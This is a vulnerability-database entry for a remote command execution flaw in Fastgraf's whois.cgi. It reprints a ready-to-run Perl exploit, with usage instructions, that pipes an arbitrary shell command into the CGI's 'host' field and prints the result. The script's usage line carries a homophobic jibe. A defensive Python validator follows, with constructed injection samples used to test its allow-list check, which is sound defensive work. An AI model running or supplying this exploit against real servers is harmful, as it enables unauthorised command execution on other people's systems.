Fastgraf’s whois.cgi – Remote Command Execution
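Vulnerability ID | 1053512 | Vulnerability type | |
Published | 2001-01-12 | Updated | 2001-01-12 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | CGI | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit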
#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - [email protected] #
# homepage: http://ws.obit.nl - exploits Fastgraf's whois.cgi #
# #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite #
# Greets to sigmo for finding stupid POST examples #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;)) #
# #
# Use like this: #
# ./whois.pl www.ifyoureadthisyouaregay.com "ls -al" #
###############################################################
use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;
$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection
sysread($sock, $buffer, 100000);
($empty, $output) = split(/PRE/, $buffer);
$output =~ s/[<>\/]//g;
if($output) {
print("$output\n");
} else { print "No data, or not vulnerable\n";
}
}
close $sock;
# milw0rm.com [2001-01-12]
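A defensive counterpart to the request above, added here as an example and not part of the original advisory or of Fastgraf's code. It assumes the CGI hands the "host" form field to a whois client; the function names and the sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# RFC 1123 hostname label: letters, digits, hyphen; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

def is_valid_host(value):
    """Allow-list check: dotted hostname labels only (this also covers IPv4 literals)."""
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.rstrip(".").split("."))

def whois_argv(form_body):
    """Parse a urlencoded POST body; return an argv list, or None if rejected.

    The list is meant for subprocess.run(argv) without a shell, so the value
    is passed as a single argument and is never interpreted by /bin/sh.
    (Assumption: the lookup is done by an external whois client.)
    """
    hosts = parse_qs(form_body, keep_blank_values=True).get("host", [])
    if len(hosts) != 1:          # missing or repeated parameter
        return None
    host = hosts[0]              # parse_qs has already percent-decoded it
    if not is_valid_host(host):  # rejects |, ;, newlines, spaces, leading '-'
        return None
    return ["whois", host]

# Constructed sample bodies (not captured traffic).
SAMPLES = [
    "host=example.com",
    "host=%7cCOMMAND",            # same shape as the body sent by the script above
    "host=example.com%3bCOMMAND", # ';' separator
    "host=example.com%0aCOMMAND", # embedded newline
    "host=-h",                    # option injection into the client
    "host=example.com&host=%7cCOMMAND",  # parameter repeated
]

def classify(samples):
    """Return (body, argv-or-None) pairs for a list of request bodies."""
    return [(body, whois_argv(body)) for body in samples]

if __name__ == "__main__":
    for body, argv in classify(SAMPLES):
        print(f"{body!r:40} -> {argv if argv else 'REJECTED'}")
```

Only the first sample yields an argv list; every other body is rejected before any process would be started.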